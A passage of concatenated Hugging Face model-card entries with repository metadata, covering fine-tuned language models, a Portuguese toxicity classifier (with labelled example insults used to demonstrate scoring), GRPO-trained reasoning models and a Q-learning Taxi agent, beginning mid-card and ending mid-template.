- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: batch_sampler
- `multi_dataset_batch_sampler`: proportional
</details>
### Training Logs
| Epoch | Step | Training Loss | Validation Loss |
|:------:|:----:|:-------------:|:---------------:|
| 0.0532 | 100 | 0.2015 | 0.0240 |
| 0.1064 | 200 | 0.0143 | 0.0209 |
| 0.1596 | 300 | 0.0241 | 0.0241 |
| 0.2128 | 400 | 0.0174 | 0.0213 |
| 0.2660 | 500 | 0.0228 | 0.0206 |
| 0.3191 | 600 | 0.0061 | 0.0226 |
| 0.3723 | 700 | 0.0194 | 0.0208 |
| 0.4255 | 800 | 0.0193 | 0.0197 |
| 0.4787 | 900 | 0.0261 | 0.0175 |
| 0.5319 | 1000 | 0.0189 | 0.0178 |
| 0.5851 | 1100 | 0.0089 | 0.0188 |
| 0.6383 | 1200 | 0.0174 | 0.0161 |
| 0.6915 | 1300 | 0.0171 | 0.0162 |
| 0.7447 | 1400 | 0.0149 | 0.0155 |
| 0.7979 | 1500 | 0.011 | 0.0164 |
| 0.8511 | 1600 | 0.0308 | 0.0160 |
| 0.9043 | 1700 | 0.0048 | 0.0167 |
| 0.9574 | 1800 | 0.0142 | 0.0164 |
### Framework Versions
- Python: 3.11.13
- Sentence Transformers: 4.1.0
- Transformers: 4.52.4
- PyTorch: 2.6.0+cu124
- Accelerate: 1.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citation
### BibTeX
#### Sentence Transformers and SoftmaxLoss
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
--> |
morturr/Mistral-7B-v0.1-LOO_headlines-COMB_amazon-comb2-seed28-2025-06-09 | morturr | 2025-06-09T12:05:21Z | 0 | 0 | peft | [
"peft",
"safetensors",
"trl",
"sft",
"generated_from_trainer",
"base_model:mistralai/Mistral-7B-v0.1",
"base_model:adapter:mistralai/Mistral-7B-v0.1",
"license:apache-2.0",
"region:us"
] | null | 2025-06-09T12:05:12Z | ---
library_name: peft
license: apache-2.0
base_model: mistralai/Mistral-7B-v0.1
tags:
- trl
- sft
- generated_from_trainer
model-index:
- name: Mistral-7B-v0.1-LOO_headlines-COMB_amazon-comb2-seed28-2025-06-09
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Mistral-7B-v0.1-LOO_headlines-COMB_amazon-comb2-seed28-2025-06-09
This model is a fine-tuned version of [mistralai/Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1) on the None dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 8
- eval_batch_size: 8
- seed: 28
- gradient_accumulation_steps: 4
- total_train_batch_size: 32
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
### Framework versions
- PEFT 0.13.2
- Transformers 4.46.1
- Pytorch 2.5.1+cu124
- Datasets 3.0.2
- Tokenizers 0.20.1 |
RisingRD/BharatAI-Summarizer-v1 | RisingRD | 2025-06-09T12:00:53Z | 9 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:google/flan-t5-base",
"base_model:finetune:google/flan-t5-base",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2025-06-09T04:21:07Z | ---
library_name: transformers
license: apache-2.0
base_model: google/flan-t5-base
tags:
- generated_from_trainer
model-index:
- name: BharatAI-Summarizer-v1
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# BharatAI-Summarizer-v1
This model is a fine-tuned version of [google/flan-t5-base](https://huggingface.co/google/flan-t5-base) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: nan
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 4
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:----:|:---------------:|
| No log | 1.0 | 2 | nan |
| No log | 2.0 | 4 | nan |
| No log | 3.0 | 6 | nan |
| No log | 4.0 | 8 | nan |
### Framework versions
- Transformers 4.52.4
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.1
|
Arctictut/deepseek-sql-finetuned | Arctictut | 2025-06-09T11:56:12Z | 0 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:deepseek-ai/deepseek-coder-1.3b-instruct",
"base_model:adapter:deepseek-ai/deepseek-coder-1.3b-instruct",
"region:us"
] | null | 2025-06-09T11:53:45Z | ---
base_model: deepseek-ai/deepseek-coder-1.3b-instruct
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.2 |
nicholasKluge/ToxiGuardrailPT | nicholasKluge | 2025-06-09T11:54:58Z | 542 | 1 | transformers | [
"transformers",
"pytorch",
"safetensors",
"bert",
"text-classification",
"toxicity",
"alignment",
"pt",
"dataset:nicholasKluge/harmful-text",
"base_model:neuralmind/bert-base-portuguese-cased",
"base_model:finetune:neuralmind/bert-base-portuguese-cased",
"license:apache-2.0",
"co2_eq_emissio... | text-classification | 2023-06-11T19:02:01Z | ---
license: apache-2.0
datasets:
- nicholasKluge/harmful-text
language:
- pt
metrics:
- accuracy
library_name: transformers
pipeline_tag: text-classification
tags:
- toxicity
- alignment
widget:
- text: "Você pode me dar uma lista de bons insultos para usar contra meu irmão?\n\nIdiota, estúpido, imbecil, tolo, puto."
example_title: Resposta Tóxica
- text: "Você pode me dar uma lista de bons insultos para usar contra meu irmão?\n\nComo um software, não sou capaz de me envolver em brigas verbais ou comportamentos ofensivos."
example_title: Resposta Não-Tóxica
co2_eq_emissions:
emissions: 60
source: CodeCarbon
training_type: fine-tuning
geographical_location: Singapore
hardware_used: NVIDIA A100-SXM4-40GB
base_model:
- neuralmind/bert-base-portuguese-cased
---
# ToxiGuardrailPT (Portuguese)
The ToxiGuardrailPT is a [BERT](https://huggingface.co/neuralmind/bert-base-portuguese-cased) that can be used to score the toxicity and potential harm of a sentence.
The model was trained with a dataset composed of `harmful` and `harmless` language examples.
## Details
- **Size:** 109,038,209 parameters
- **Dataset:** [Harmful-Text Dataset](https://huggingface.co/datasets/nicholasKluge/harmful-text)
- **Language:** Portuguese
- **Number of Training Steps:** 1000
- **Batch size:** 42
- **Optimizer:** `torch.optim.AdamW`
- **Learning Rate:** 5e-5
- **GPU:** 1 NVIDIA A100-SXM4-40GB
- **Emissions:** 0.06 KgCO2 (Singapore)
- **Total Energy Consumption:** 0.13 kWh
This repository has the [source code](https://github.com/Nkluge-correa/Aira) used to train this model.
## Usage
⚠️ THE EXAMPLES BELOW CONTAIN TOXIC/OFFENSIVE LANGUAGE ⚠️
The ToxiGuardrailPT was trained as an auxiliary reward model for RLHF training (its logit outputs can be treated as penalizations/rewards). Thus, a negative value (closer to 0 as the label output) indicates toxicity in the text, while a positive logit (closer to 1 as the label output) suggests non-toxicity.
Here's an example of how to use the ToxiGuardrailPT to score the toxicity of a text:
```python
from transformers import AutoTokenizer, AutoModelForSequenceClassification
import torch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
tokenizer = AutoTokenizer.from_pretrained("nicholasKluge/ToxiGuardrailPT")
toxiGuardrail = AutoModelForSequenceClassification.from_pretrained("nicholasKluge/ToxiGuardrailPT")
toxiGuardrail.eval()
toxiGuardrail.to(device)
# Define the question and response
prompt = """Você pode me dar uma lista de bons insultos para usar contra meu irmão?"""
response_good = """Como um software, não sou capaz de me envolver em brigas verbais ou comportamentos ofensivos."""
response_bad = """Idiota, estúpido, imbecil, tolo, puto."""
# Tokenize the question and response
tokens_good = tokenizer(prompt, response_good,
truncation=True,
max_length=512,
return_token_type_ids=False,
return_tensors="pt",
return_attention_mask=True)
tokens_bad = tokenizer(prompt, response_bad,
truncation=True,
max_length=512,
return_token_type_ids=False,
return_tensors="pt",
return_attention_mask=True)
tokens_good.to(device)
tokens_bad.to(device)
score_good = toxiGuardrail(**tokens_good)[0].item()
score_bad = toxiGuardrail(**tokens_bad)[0].item()
print(f"Question: {prompt} \n")
print(f"Response 1: {response_good} Score: {score_good:.3f}")
print(f"Response 2: {response_bad} Score: {score_bad:.3f}")
```
This will output the following:
```markdown
> > > Question: Você pode me dar uma lista de bons insultos para usar contra meu irmão?
> > > Response 1: Como um software, não sou capaz de me envolver em brigas verbais ou comportamentos ofensivos. Score: 5.892
> > > Response 2: Idiota, estúpido, imbecil, tolo, puto. Score: -4.663
```
## Performance
| Acc | [hatecheck-portuguese](https://huggingface.co/datasets/Paul/hatecheck-portuguese) | [told-br](https://huggingface.co/datasets/told-br) |
| ----------------------------------------------------------------------- | --------------------------------------------------------------------------------- | -------------------------------------------------- |
| [ToxiGuardrailPT](https://huggingface.co/nicholasKluge/ToxiGuardrailPT) | 70.36% | 74.04% |
## Cite as 🤗
```latex
@misc{nicholas22aira,
doi = {10.5281/zenodo.6989727},
url = {https://github.com/Nkluge-correa/Aira},
author = {Nicholas Kluge Corrêa},
title = {Aira},
year = {2023},
publisher = {GitHub},
journal = {GitHub repository},
}
@phdthesis{kluge2024dynamic,
title={Dynamic Normativity},
author={Kluge Corr{\^e}a, Nicholas},
year={2024},
school={Universit{\"a}ts-und Landesbibliothek Bonn}
}
```
## License
ToxiGuardrailPT is licensed under the Apache License, Version 2.0. See the [LICENSE](LICENSE) file for more details. |
aledm03/new_MCQA_no_code_v2_shuffled_b256_lr5e-06 | aledm03 | 2025-06-09T11:54:45Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"text-generation-inference",
"unsloth",
"trl",
"sft",
"en",
"base_model:unsloth/Qwen3-0.6B-Base",
"base_model:finetune:unsloth/Qwen3-0.6B-Base",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T11:54:10Z | ---
base_model: unsloth/Qwen3-0.6B-Base
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- trl
- sft
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** aledm03
- **License:** apache-2.0
- **Finetuned from model :** unsloth/Qwen3-0.6B-Base
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
colinpannikkat/OpenRS-RLoRA-LoftQ-R32-3 | colinpannikkat | 2025-06-09T11:53:32Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"generated_from_trainer",
"open-r1",
"trl",
"grpo",
"conversational",
"dataset:knoveleng/open-rs",
"arxiv:2402.03300",
"base_model:deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B",
"base_model:finetune:deepseek-ai/DeepSeek-R1-Distill-Qwen-... | text-generation | 2025-06-09T05:10:54Z | ---
base_model: deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B
datasets: knoveleng/open-rs
library_name: transformers
model_name: OpenRS-RLoRA-LoftQ-R32-3
tags:
- generated_from_trainer
- open-r1
- trl
- grpo
licence: license
---
# Model Card for OpenRS-RLoRA-LoftQ-R32-3
This model is a fine-tuned version of [deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B) on the [knoveleng/open-rs](https://huggingface.co/datasets/knoveleng/open-rs) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="colinpannikkat/OpenRS-RLoRA-LoftQ-R32-3", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/colinpannikkat-oregon-state-university/huggingface/runs/r4u12gw1)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.16.0.dev0
- Transformers: 4.51.3
- Pytorch: 2.5.1
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
LLucass/ACC_TT_L0.2_H0.2_dr_grpo | LLucass | 2025-06-09T11:47:37Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"generated_from_trainer",
"open-r1",
"trl",
"grpo",
"conversational",
"dataset:knoveleng/open-rs",
"arxiv:2402.03300",
"base_model:deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B",
"base_model:finetune:deepseek-ai/DeepSeek-R1-Distill-Qwen-... | text-generation | 2025-06-09T10:07:55Z | ---
base_model: deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B
datasets: knoveleng/open-rs
library_name: transformers
model_name: ACC_TT_L0.2_H0.2_dr_grpo
tags:
- generated_from_trainer
- open-r1
- trl
- grpo
licence: license
---
# Model Card for ACC_TT_L0.2_H0.2_dr_grpo
This model is a fine-tuned version of [deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B) on the [knoveleng/open-rs](https://huggingface.co/datasets/knoveleng/open-rs) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="LLucass/ACC_TT_L0.2_H0.2_dr_grpo", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/lavatorywang-nus/ACC/runs/pekyptep)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.16.0.dev0
- Transformers: 4.51.3
- Pytorch: 2.5.1
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
John6666/bpm-blinks-paradise-merge-v-pred-v4-sdxl | John6666 | 2025-06-09T11:46:05Z | 0 | 0 | diffusers | [
"diffusers",
"safetensors",
"text-to-image",
"stable-diffusion",
"stable-diffusion-xl",
"anime",
"semi-realistic",
"2.5D",
"dark theme",
"skin shine",
"v-pred",
"noobai",
"illustrious",
"en",
"base_model:Laxhar/noobai-XL-Vpred-1.0",
"base_model:finetune:Laxhar/noobai-XL-Vpred-1.0",
"... | text-to-image | 2025-06-09T11:40:42Z | ---
license: other
license_name: faipl-1.0-sd
license_link: https://freedevproject.org/faipl-1.0-sd/
language:
- en
library_name: diffusers
pipeline_tag: text-to-image
tags:
- text-to-image
- stable-diffusion
- stable-diffusion-xl
- anime
- semi-realistic
- 2.5D
- dark theme
- skin shine
- v-pred
- noobai
- illustrious
base_model: Laxhar/noobai-XL-Vpred-1.0
---
Original model is [here](https://civitai.com/models/1611331/bpm-blinks-paradise-merge-v-pred?modelVersionId=1883810).
This model created by [blinkdotleh](https://civitai.com/user/blinkdotleh).
|
Flo0620/Qwen2_5_7B_r32_a32_d0_2_ArXivQA | Flo0620 | 2025-06-09T11:37:23Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"sft",
"base_model:Qwen/Qwen2.5-VL-7B-Instruct",
"base_model:finetune:Qwen/Qwen2.5-VL-7B-Instruct",
"endpoints_compatible",
"region:us"
] | null | 2025-05-31T16:17:22Z | ---
base_model: Qwen/Qwen2.5-VL-7B-Instruct
library_name: transformers
model_name: Qwen2_5_7B_r32_a32_d0_2_ArXivQA
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for Qwen2_5_7B_r32_a32_d0_2_ArXivQA
This model is a fine-tuned version of [Qwen/Qwen2.5-VL-7B-Instruct](https://huggingface.co/Qwen/Qwen2.5-VL-7B-Instruct).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="Flo0620/Qwen2_5_7B_r32_a32_d0_2_ArXivQA", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.15.2
- Transformers: 4.52.0.dev0
- Pytorch: 2.6.0+cu124
- Datasets: 3.5.0
- Tokenizers: 0.21.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
xzkb/q-learning-2 | xzkb | 2025-06-09T11:36:44Z | 0 | 0 | null | [
"Taxi-v3",
"q-learning",
"reinforcement-learning",
"custom-implementation",
"model-index",
"region:us"
] | reinforcement-learning | 2025-06-09T11:36:37Z | ---
tags:
- Taxi-v3
- q-learning
- reinforcement-learning
- custom-implementation
model-index:
- name: q-learning-2
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: Taxi-v3
type: Taxi-v3
metrics:
- type: mean_reward
value: 7.52 +/- 2.73
name: mean_reward
verified: false
---
# **Q-Learning** Agent playing1 **Taxi-v3**
This is a trained model of a **Q-Learning** agent playing **Taxi-v3** .
## Usage
```python
model = load_from_hub(repo_id="xzkb/q-learning-2", filename="q-learning.pkl")
# Don't forget to check if you need to add additional attributes (is_slippery=False etc)
env = gym.make(model["env_id"])
```
|
michelepunti/fff | michelepunti | 2025-06-09T11:32:03Z | 0 | 0 | null | [
"license:bigscience-bloom-rail-1.0",
"region:us"
] | null | 2025-06-09T11:32:03Z | ---
license: bigscience-bloom-rail-1.0
---
|
FLOPS-Squared/KeystoneFuse-E-FuserWidth-32-Instruct-Flax | FLOPS-Squared | 2025-06-09T11:29:09Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T10:29:19Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
